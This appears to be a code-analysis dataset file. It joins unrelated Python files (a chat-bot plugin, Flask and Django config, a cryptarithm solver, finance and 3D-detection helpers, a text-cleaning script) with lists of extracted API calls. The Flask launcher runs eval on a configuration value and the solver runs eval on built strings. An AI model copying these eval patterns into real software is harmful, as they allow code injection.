export.plugin_name = '自动插话'
export.plugin_command = "无"
export.plugin_usage = '让机器人自动插话。'
export.default_status = False # 插件默认开关
export.ignore = False # 插件管理器忽略此插件
message = on_message(permission=GROUP, priority=99, block=True)
@message.handle()
async def _(bot: Bot, event: GroupMessageEvent):
'''
处理自动插话
'''
# 是否随机插话
bot_id = int(bot.self_id)
num = random.randrange(100)
active = await source.get_active(bot_id, event.group_id)
if num > active:
await message.finish()
# 获取一条骚话
text = await source.get_saohua()
num = random.randrange(100)
if num < 20:
# 是否转换语音
voice_str = await source.get_voice(text)
if voice_str is not None:
msg = MessageSegment.record(voice_str)
await message.finish(msg)
msg = MessageSegment.text(text)
await message.finish(msg)
| [
"nonebot.on_message",
"random.randrange",
"nonebot.adapters.cqhttp.MessageSegment.record",
"nonebot.adapters.cqhttp.MessageSegment.text",
"nonebot.plugin.export"
] | [((255, 263), 'nonebot.plugin.export', 'export', ([], {}), '()\n', (261, 263), False, 'from nonebot.plugin import export\n'), ((442, 495), 'nonebot.on_message', 'on_message', ([], {'permission': 'GROUP', 'priority': '(99)', 'block': '(True)'}), '(permission=GROUP, priority=99, block=True)\n', (452, 495), False, 'from nonebot import on_message\n'), ((645, 666), 'random.randrange', 'random.randrange', (['(100)'], {}), '(100)\n', (661, 666), False, 'import random\n'), ((841, 862), 'random.randrange', 'random.randrange', (['(100)'], {}), '(100)\n', (857, 862), False, 'import random\n'), ((1080, 1105), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', (['text'], {}), '(text)\n', (1099, 1105), False, 'from nonebot.adapters.cqhttp import Bot, GroupMessageEvent, MessageSegment\n'), ((998, 1030), 'nonebot.adapters.cqhttp.MessageSegment.record', 'MessageSegment.record', (['voice_str'], {}), '(voice_str)\n', (1019, 1030), False, 'from nonebot.adapters.cqhttp import Bot, GroupMessageEvent, MessageSegment\n')] |
#!/usr/bin/python
# -*- coding: UTF-8 -*
"""
"""
import os
# from flask_cors import CORS
from api import create_app
from config import configuration
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
# CORS(app, supports_credentials=True)
if __name__ == '__main__':
host, port, debug = configuration.get_start_config()
app.run(host=host, port=port, debug=eval(debug))
| [
"config.configuration.get_start_config",
"os.getenv"
] | [((299, 331), 'config.configuration.get_start_config', 'configuration.get_start_config', ([], {}), '()\n', (329, 331), False, 'from config import configuration\n'), ((169, 194), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (178, 194), False, 'import os\n')] |
# 14/01/2018
from itertools import permutations
import time
def cryptarithmetic_solver(puzzle):
'''
Solves cryptarithms using brute-force.
Notes: eval() is frowned upon + direct translation is very expensive.
'''
start = time.perf_counter()
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
leading = list(set(c[0] for c in puzzle.split() if c[0] in alphabet))
letters = list(set([c for c in puzzle if c in alphabet]))
for attempt in permutations("0123456789", len(letters)):
attempt = {k: v for k, v in zip(letters, attempt)}
if any([attempt[k] == '0' for k in leading]):
continue
elif eval(''.join([attempt[k] if k in letters else k for k in puzzle])):
print("Time taken: {:.2f} seconds".format(time.perf_counter() - start))
return '{' + ', '.join(sorted(['"{}"=>{}'.format(k, attempt[k]) for k in attempt])) + '}'
| [
"time.perf_counter"
] | [((242, 261), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (259, 261), False, 'import time\n'), ((772, 791), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (789, 791), False, 'import time\n')] |
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from qf_lib.analysis.rolling_analysis.rolling_analysis import RollingAnalysisFactory
from qf_lib.analysis.tearsheets.abstract_tearsheet import AbstractTearsheet
from qf_lib.common.enums.grid_proportion import GridProportion
from qf_lib.common.enums.plotting_mode import PlottingMode
from qf_lib.containers.series.qf_series import QFSeries
from qf_lib.documents_utils.document_exporting.element.grid import GridElement
from qf_lib.documents_utils.document_exporting.element.new_page import NewPageElement
from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement
from qf_lib.documents_utils.document_exporting.element.table import Table
from qf_lib.plotting.charts.regression_chart import RegressionChart
from qf_lib.plotting.charts.returns_heatmap_chart import ReturnsHeatmapChart
from qf_lib.plotting.helpers.create_returns_bar_chart import create_returns_bar_chart
from qf_lib.plotting.helpers.create_returns_distribution import create_returns_distribution
from qf_lib.settings import Settings
class TearsheetComparative(AbstractTearsheet):
"""Creates a PDF report, which additionally contains a benchamrk.
Can be used with or without the benchmark
Parameters
----------
settings: Settings
settings of the project
pdf_exporter: PDFExporter
tool that creates the pdf with the result
strategy_series: QFSeries
timeseries of the trading of the strategy
benchmark_series: QFSeries
timeseries of the benchmark
live_date: datetime
if set it is used to generate the cone chart
title: str
title of the document
"""
def __init__(self, settings: Settings, pdf_exporter, strategy_series: QFSeries, benchmark_series: QFSeries,
live_date: datetime = None, title: str = "Strategy Analysis"):
super().__init__(settings, pdf_exporter, strategy_series, live_date, title)
self.benchmark_series = benchmark_series
def build_document(self):
series_list = [self.strategy_series, self.benchmark_series]
# First Page
self._add_header()
self._add_perf_chart(series_list)
self._add_relative_performance_chart(self.strategy_series, self.benchmark_series)
self._add_statistics_table(series_list)
# Next Page
self.document.add_element(NewPageElement())
self._add_header()
self.document.add_element(ParagraphElement("\n"))
self._add_returns_statistics_charts(self.strategy_series)
self._add_returns_statistics_charts(self.benchmark_series)
self.document.add_element(ParagraphElement("\n"))
self.document.add_element(ParagraphElement("\n"))
self._add_ret_distribution_and_similarity()
# Next Page
self.document.add_element(NewPageElement())
self._add_header()
self.document.add_element(ParagraphElement("\n"))
self.document.add_element(ParagraphElement("\n"))
self._add_rolling_return_chart(series_list)
self.document.add_element(ParagraphElement("\n"))
self.document.add_element(ParagraphElement("\n"))
self._add_rolling_vol_chart(series_list)
def _add_returns_statistics_charts(self, series):
grid = self._get_new_grid()
# Monthly returns heatmap
heatmap_chart = ReturnsHeatmapChart(series, title="Monthly Returns - {}".format(series.name))
grid.add_chart(heatmap_chart)
# Annual returns bar chart
annual_ret_chart = create_returns_bar_chart(series, title="Annual Returns - {}".format(series.name))
grid.add_chart(annual_ret_chart)
self.document.add_element(grid)
def _add_ret_distribution_and_similarity(self):
grid = GridElement(mode=PlottingMode.PDF,
figsize=self.half_image_size, dpi=self.dpi)
# Distribution of Monthly Returns
chart = create_returns_distribution(self.strategy_series)
grid.add_chart(chart)
# Regression chart
chart = RegressionChart(self.benchmark_series, self.strategy_series)
grid.add_chart(chart)
# Distribution of Monthly Returns
chart = create_returns_distribution(self.benchmark_series)
grid.add_chart(chart)
# Regression chart
chart = RegressionChart(self.strategy_series, self.benchmark_series)
grid.add_chart(chart)
self.document.add_element(grid)
def _add_rolling_table(self):
dtos = RollingAnalysisFactory.calculate_analysis(self.strategy_series, self.benchmark_series)
column_names = [
Table.ColumnCell("Rolling Return Period", css_class="left-align"),
"Strategy Average",
"Strategy Worst",
Table.ColumnCell("Strategy Best", css_class="right-align"),
"Benchmark Average",
"Benchmark Worst",
Table.ColumnCell("Benchmark Best", css_class="right-align"),
Table.ColumnCell("% Strategy outperform Benchmark")]
result = Table(column_names, grid_proportion=GridProportion.Sixteen, css_class="table rolling-table")
for dto in dtos:
result.add_row([Table.Cell(dto.period, css_class="right-align"),
Table.Cell(dto.strategy_average, "{:.2%}"),
Table.Cell(dto.strategy_worst, "{:.2%}"),
Table.Cell(dto.strategy_best, "{:.2%}"),
Table.Cell(dto.benchmark_average, "{:.2%}"),
Table.Cell(dto.benchmark_worst, "{:.2%}"),
Table.Cell(dto.benchmark_best, "{:.2%}"),
Table.Cell(dto.percentage_difference, "{:.2%}")])
self.document.add_element(result)
| [
"qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell",
"qf_lib.plotting.helpers.create_returns_distribution.create_returns_distribution",
"qf_lib.documents_utils.document_exporting.element.table.Table.Cell",
"qf_lib.documents_utils.document_exporting.element.new_page.NewPageElement",
"qf_lib.plotting.charts.regression_chart.RegressionChart",
"qf_lib.documents_utils.document_exporting.element.grid.GridElement",
"qf_lib.documents_utils.document_exporting.element.table.Table",
"qf_lib.analysis.rolling_analysis.rolling_analysis.RollingAnalysisFactory.calculate_analysis",
"qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement"
] | [((4439, 4517), 'qf_lib.documents_utils.document_exporting.element.grid.GridElement', 'GridElement', ([], {'mode': 'PlottingMode.PDF', 'figsize': 'self.half_image_size', 'dpi': 'self.dpi'}), '(mode=PlottingMode.PDF, figsize=self.half_image_size, dpi=self.dpi)\n', (4450, 4517), False, 'from qf_lib.documents_utils.document_exporting.element.grid import GridElement\n'), ((4603, 4652), 'qf_lib.plotting.helpers.create_returns_distribution.create_returns_distribution', 'create_returns_distribution', (['self.strategy_series'], {}), '(self.strategy_series)\n', (4630, 4652), False, 'from qf_lib.plotting.helpers.create_returns_distribution import create_returns_distribution\n'), ((4727, 4787), 'qf_lib.plotting.charts.regression_chart.RegressionChart', 'RegressionChart', (['self.benchmark_series', 'self.strategy_series'], {}), '(self.benchmark_series, self.strategy_series)\n', (4742, 4787), False, 'from qf_lib.plotting.charts.regression_chart import RegressionChart\n'), ((4877, 4927), 'qf_lib.plotting.helpers.create_returns_distribution.create_returns_distribution', 'create_returns_distribution', (['self.benchmark_series'], {}), '(self.benchmark_series)\n', (4904, 4927), False, 'from qf_lib.plotting.helpers.create_returns_distribution import create_returns_distribution\n'), ((5002, 5062), 'qf_lib.plotting.charts.regression_chart.RegressionChart', 'RegressionChart', (['self.strategy_series', 'self.benchmark_series'], {}), '(self.strategy_series, self.benchmark_series)\n', (5017, 5062), False, 'from qf_lib.plotting.charts.regression_chart import RegressionChart\n'), ((5184, 5275), 'qf_lib.analysis.rolling_analysis.rolling_analysis.RollingAnalysisFactory.calculate_analysis', 'RollingAnalysisFactory.calculate_analysis', (['self.strategy_series', 'self.benchmark_series'], {}), '(self.strategy_series, self.\n benchmark_series)\n', (5225, 5275), False, 'from qf_lib.analysis.rolling_analysis.rolling_analysis import RollingAnalysisFactory\n'), ((5729, 5826), 'qf_lib.documents_utils.document_exporting.element.table.Table', 'Table', (['column_names'], {'grid_proportion': 'GridProportion.Sixteen', 'css_class': '"""table rolling-table"""'}), "(column_names, grid_proportion=GridProportion.Sixteen, css_class=\n 'table rolling-table')\n", (5734, 5826), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((3037, 3053), 'qf_lib.documents_utils.document_exporting.element.new_page.NewPageElement', 'NewPageElement', ([], {}), '()\n', (3051, 3053), False, 'from qf_lib.documents_utils.document_exporting.element.new_page import NewPageElement\n'), ((3116, 3138), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3132, 3138), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3309, 3331), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3325, 3331), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3367, 3389), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3383, 3389), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3498, 3514), 'qf_lib.documents_utils.document_exporting.element.new_page.NewPageElement', 'NewPageElement', ([], {}), '()\n', (3512, 3514), False, 'from qf_lib.documents_utils.document_exporting.element.new_page import NewPageElement\n'), ((3578, 3600), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3594, 3600), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3636, 3658), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3652, 3658), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3748, 3770), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3764, 3770), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3806, 3828), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3822, 3828), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((5309, 5374), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""Rolling Return Period"""'], {'css_class': '"""left-align"""'}), "('Rolling Return Period', css_class='left-align')\n", (5325, 5374), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5450, 5508), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""Strategy Best"""'], {'css_class': '"""right-align"""'}), "('Strategy Best', css_class='right-align')\n", (5466, 5508), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5586, 5645), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""Benchmark Best"""'], {'css_class': '"""right-align"""'}), "('Benchmark Best', css_class='right-align')\n", (5602, 5645), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5659, 5710), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""% Strategy outperform Benchmark"""'], {}), "('% Strategy outperform Benchmark')\n", (5675, 5710), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5876, 5923), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.period'], {'css_class': '"""right-align"""'}), "(dto.period, css_class='right-align')\n", (5886, 5923), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5953, 5995), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.strategy_average', '"""{:.2%}"""'], {}), "(dto.strategy_average, '{:.2%}')\n", (5963, 5995), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6025, 6065), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.strategy_worst', '"""{:.2%}"""'], {}), "(dto.strategy_worst, '{:.2%}')\n", (6035, 6065), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6095, 6134), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.strategy_best', '"""{:.2%}"""'], {}), "(dto.strategy_best, '{:.2%}')\n", (6105, 6134), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6164, 6207), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.benchmark_average', '"""{:.2%}"""'], {}), "(dto.benchmark_average, '{:.2%}')\n", (6174, 6207), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6237, 6278), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.benchmark_worst', '"""{:.2%}"""'], {}), "(dto.benchmark_worst, '{:.2%}')\n", (6247, 6278), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6308, 6348), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.benchmark_best', '"""{:.2%}"""'], {}), "(dto.benchmark_best, '{:.2%}')\n", (6318, 6348), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6378, 6425), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.percentage_difference', '"""{:.2%}"""'], {}), "(dto.percentage_difference, '{:.2%}')\n", (6388, 6425), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n')] |
#!/usr/bin/env python3
# Find dates for exams at UniPD
"""
Copyright 2022 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, csv, requests, datetime, json
from queue import PriorityQueue
# CSV file with all the desired courses
# The first column must be the course code
COURSES_LIST = sys.argv[1] if len(sys.argv) == 2 else "courses.csv"
# Dates where to find exams
today = datetime.date.today()
BEGIN_DATE = today.strftime("%d-%m-%Y")
END_DATE = (today + datetime.timedelta(days = 2 * 30)).strftime("%d-%m-%Y")
class Exam:
def __init__(self, code, *data):
self.code = code.strip()
self.data = [value.strip() for value in data]
def __lt__(self, other):
return self.code.__lt__(other.code)
def __str__(self):
return ', '.join([self.code] + self.data)
exams = []
with open(COURSES_LIST, newline='') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
exams.append(Exam(*row))
exam_dates = PriorityQueue()
tot = len(exams)
for i, exam in enumerate(exams):
data = json.loads(requests.post("https://agendastudentiunipd.easystaff.it/test_call.php", {
"et_er" : "1",
"esami_insegnamento" : exam.code,
"datefrom" : BEGIN_DATE,
"dateto" : END_DATE,
}).text)
print(f"{i+1}/{tot}\t{exam.code}", file=sys.stderr)
for i in (ins := data["Insegnamenti"]):
for app in ins[i]["Appelli"]:
exam_dates.put((
datetime.datetime.strptime(app["Data"], '%d-%m-%Y'),
exam
))
last = [None, Exam("")]
while not exam_dates.empty():
app = exam_dates.get()
if last[0] != app[0] or last[1].code != app[1].code:
print(app[0].strftime("%d/%m/%Y"), str(app[1]))
last = app
| [
"requests.post",
"datetime.datetime.strptime",
"datetime.timedelta",
"queue.PriorityQueue",
"datetime.date.today",
"csv.reader"
] | [((876, 897), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (895, 897), False, 'import sys, csv, requests, datetime, json\n'), ((1472, 1487), 'queue.PriorityQueue', 'PriorityQueue', ([], {}), '()\n', (1485, 1487), False, 'from queue import PriorityQueue\n'), ((1354, 1403), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""', 'quotechar': '"""\\""""'}), '(csvfile, delimiter=\',\', quotechar=\'"\')\n', (1364, 1403), False, 'import sys, csv, requests, datetime, json\n'), ((958, 989), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(2 * 30)'}), '(days=2 * 30)\n', (976, 989), False, 'import sys, csv, requests, datetime, json\n'), ((1559, 1732), 'requests.post', 'requests.post', (['"""https://agendastudentiunipd.easystaff.it/test_call.php"""', "{'et_er': '1', 'esami_insegnamento': exam.code, 'datefrom': BEGIN_DATE,\n 'dateto': END_DATE}"], {}), "('https://agendastudentiunipd.easystaff.it/test_call.php', {\n 'et_er': '1', 'esami_insegnamento': exam.code, 'datefrom': BEGIN_DATE,\n 'dateto': END_DATE})\n", (1572, 1732), False, 'import sys, csv, requests, datetime, json\n'), ((1920, 1971), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (["app['Data']", '"""%d-%m-%Y"""'], {}), "(app['Data'], '%d-%m-%Y')\n", (1946, 1971), False, 'import sys, csv, requests, datetime, json\n')] |
import os
from dotenv import load_dotenv
load_dotenv()
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# use this flag to enable mysql
# only in production we use mysql
# for dev and testing we will use sqlite
MYSQL = bool(os.getenv("MYSQL", False))
MYSQL_DATABASE = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': os.environ["DB_NAME"],
'USER': os.environ["DB_USERNAME"],
'PASSWORD': os.environ["DB_PASSWORD"],
'HOST': os.environ['DB_HOST'],
'PORT': '',
}
}
SQLITE_DATABASE = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
def get_db_config():
if MYSQL:
return MYSQL_DATABASE
return SQLITE_DATABASE
| [
"os.path.abspath",
"os.path.join",
"os.getenv",
"dotenv.load_dotenv"
] | [((43, 56), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (54, 56), False, 'from dotenv import load_dotenv\n'), ((251, 276), 'os.getenv', 'os.getenv', (['"""MYSQL"""', '(False)'], {}), "('MYSQL', False)\n", (260, 276), False, 'import os\n'), ((102, 127), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (117, 127), False, 'import os\n'), ((659, 695), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""db.sqlite3"""'], {}), "(BASE_DIR, 'db.sqlite3')\n", (671, 695), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import UserProfile
admin.site.register(UserProfile)
| [
"django.contrib.admin.site.register"
] | [((132, 164), 'django.contrib.admin.site.register', 'admin.site.register', (['UserProfile'], {}), '(UserProfile)\n', (151, 164), False, 'from django.contrib import admin\n')] |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
import copy
import numpy as np
import tensorflow as tf
from wavedata.tools.obj_detection import obj_utils
from wavedata.tools.obj_detection import evaluation
from avod.core import anchor_projector
from avod.core import box_3d_encoder
COLOUR_SCHEME_PREDICTIONS = {
"Easy GT": (255, 255, 0), # Yellow
"Medium GT": (255, 128, 0), # Orange
"Hard GT": (255, 0, 0), # Red
"Prediction": (50, 255, 50), # Green
}
def get_gts_based_on_difficulty(dataset, img_idx):
"""Returns lists of ground-truth based on difficulty.
"""
# Get all ground truth labels
all_gt_objs = obj_utils.read_labels(dataset.label_dir, img_idx)
# Filter to dataset classes
gt_objs = dataset.kitti_utils.filter_labels(all_gt_objs)
# Filter objects to desired difficulty
easy_gt_objs = dataset.kitti_utils.filter_labels(
copy.deepcopy(gt_objs), difficulty=0)
medium_gt_objs = dataset.kitti_utils.filter_labels(
copy.deepcopy(gt_objs), difficulty=1)
hard_gt_objs = dataset.kitti_utils.filter_labels(
copy.deepcopy(gt_objs), difficulty=2)
for gt_obj in easy_gt_objs:
gt_obj.type = 'Easy GT'
for gt_obj in medium_gt_objs:
gt_obj.type = 'Medium GT'
for gt_obj in hard_gt_objs:
gt_obj.type = 'Hard GT'
return easy_gt_objs, medium_gt_objs, hard_gt_objs, all_gt_objs
def get_max_ious_3d(all_gt_boxes_3d, pred_boxes_3d):
"""Helper function to calculate 3D IoU for the given predictions.
Args:
all_gt_boxes_3d: A list of the same ground-truth boxes in box_3d
format.
pred_boxes_3d: A list of predictions in box_3d format.
"""
# Only calculate ious if there are predictions
if pred_boxes_3d:
# Convert to iou format
gt_objs_iou_fmt = box_3d_encoder.box_3d_to_3d_iou_format(
all_gt_boxes_3d)
pred_objs_iou_fmt = box_3d_encoder.box_3d_to_3d_iou_format(
pred_boxes_3d)
max_ious_3d = np.zeros(len(all_gt_boxes_3d))
for gt_obj_idx in range(len(all_gt_boxes_3d)):
gt_obj_iou_fmt = gt_objs_iou_fmt[gt_obj_idx]
ious_3d = evaluation.three_d_iou(gt_obj_iou_fmt,
pred_objs_iou_fmt)
max_ious_3d[gt_obj_idx] = np.amax(ious_3d)
else:
# No detections, all ious = 0
max_ious_3d = np.zeros(len(all_gt_boxes_3d))
return max_ious_3d
def tf_project_to_image_space(anchors, calib_p2, image_shape, img_idx):
"""Helper function to convert data to tensors and project
to image space using the tf projection function.
"""
anchors_tensor = tf.convert_to_tensor(anchors, tf.float32)
calib_p2_tensor = tf.convert_to_tensor(calib_p2, tf.float32)
image_shape_tensor = tf.convert_to_tensor(image_shape, tf.float32)
projected_boxes_tensor, _ = \
anchor_projector.tf_project_to_image_space(
anchors_tensor,
calib_p2_tensor,
image_shape_tensor)
sess = tf.Session(config=npu_config_proto())
with sess.as_default():
projected_boxes = projected_boxes_tensor.eval()
return projected_boxes
| [
"wavedata.tools.obj_detection.obj_utils.read_labels",
"avod.core.anchor_projector.tf_project_to_image_space",
"avod.core.box_3d_encoder.box_3d_to_3d_iou_format",
"wavedata.tools.obj_detection.evaluation.three_d_iou",
"copy.deepcopy",
"tensorflow.convert_to_tensor",
"numpy.amax"
] | [((1925, 1974), 'wavedata.tools.obj_detection.obj_utils.read_labels', 'obj_utils.read_labels', (['dataset.label_dir', 'img_idx'], {}), '(dataset.label_dir, img_idx)\n', (1946, 1974), False, 'from wavedata.tools.obj_detection import obj_utils\n'), ((3972, 4013), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['anchors', 'tf.float32'], {}), '(anchors, tf.float32)\n', (3992, 4013), True, 'import tensorflow as tf\n'), ((4036, 4078), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['calib_p2', 'tf.float32'], {}), '(calib_p2, tf.float32)\n', (4056, 4078), True, 'import tensorflow as tf\n'), ((4104, 4149), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image_shape', 'tf.float32'], {}), '(image_shape, tf.float32)\n', (4124, 4149), True, 'import tensorflow as tf\n'), ((4193, 4292), 'avod.core.anchor_projector.tf_project_to_image_space', 'anchor_projector.tf_project_to_image_space', (['anchors_tensor', 'calib_p2_tensor', 'image_shape_tensor'], {}), '(anchors_tensor, calib_p2_tensor,\n image_shape_tensor)\n', (4235, 4292), False, 'from avod.core import anchor_projector\n'), ((2175, 2197), 'copy.deepcopy', 'copy.deepcopy', (['gt_objs'], {}), '(gt_objs)\n', (2188, 2197), False, 'import copy\n'), ((2277, 2299), 'copy.deepcopy', 'copy.deepcopy', (['gt_objs'], {}), '(gt_objs)\n', (2290, 2299), False, 'import copy\n'), ((2377, 2399), 'copy.deepcopy', 'copy.deepcopy', (['gt_objs'], {}), '(gt_objs)\n', (2390, 2399), False, 'import copy\n'), ((3112, 3167), 'avod.core.box_3d_encoder.box_3d_to_3d_iou_format', 'box_3d_encoder.box_3d_to_3d_iou_format', (['all_gt_boxes_3d'], {}), '(all_gt_boxes_3d)\n', (3150, 3167), False, 'from avod.core import box_3d_encoder\n'), ((3209, 3262), 'avod.core.box_3d_encoder.box_3d_to_3d_iou_format', 'box_3d_encoder.box_3d_to_3d_iou_format', (['pred_boxes_3d'], {}), '(pred_boxes_3d)\n', (3247, 3262), False, 'from avod.core import box_3d_encoder\n'), ((3466, 3523), 'wavedata.tools.obj_detection.evaluation.three_d_iou', 'evaluation.three_d_iou', (['gt_obj_iou_fmt', 'pred_objs_iou_fmt'], {}), '(gt_obj_iou_fmt, pred_objs_iou_fmt)\n', (3488, 3523), False, 'from wavedata.tools.obj_detection import evaluation\n'), ((3608, 3624), 'numpy.amax', 'np.amax', (['ious_3d'], {}), '(ious_3d)\n', (3615, 3624), True, 'import numpy as np\n')] |
# Importing the Libraries
import pandas as pd
import numpy as np
import re, string
import swifter
from nltk.corpus import stopwords
stop_words = set(stopwords.words("english"))
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, f1_score, roc_auc_score
from sklearn.linear_model import LogisticRegression
from scipy.sparse import hstack
import joblib
import warnings
warnings.filterwarnings("ignore")
# Importing the training dataset
train_df = pd.read_csv("../input/toxic-data/train.csv")
# Importing the test data
test_data = pd.read_csv("../input/toxic-data/test.csv")
test_labels = pd.read_csv("../input/toxic-data/test_labels.csv")
# Merging the two datasets above for complete test data
test_df = pd.merge(test_data, test_labels, on="id")
test_df.head()
# Filtering out the samples having actual target labels
new_test_df = test_df[(test_df['toxic']!=-1) & (test_df['severe_toxic']!=-1) & (test_df['obscene']!=-1) &
(test_df['threat']!=-1) & (test_df['insult']!=-1) & (test_df['identity_hate']!=-1)]
new_test_df.reset_index(drop=True, inplace=True)
new_test_df.head()
# Creating a function to clean the training dataset
def clean_text(text):
"""This function will take text as input and return a cleaned text
by removing html char, punctuations, non-letters, newline and converting it
to lower case.
"""
# Converting to lower case letters
text = text.lower()
# Removing the contraction of few words
text = re.sub(r"what's", "what is ", text)
text = re.sub(r"\'s", " ", text)
text = re.sub(r"\'ve", " have ", text)
text = re.sub(r"can't", "can not ", text)
text = re.sub(r"n't", " not ", text)
text = re.sub(r"i'm", "i am ", text)
text = re.sub(r"\'re", " are ", text)
text = re.sub(r"\'d", " would ", text)
text = re.sub(r"\'ll", " will ", text)
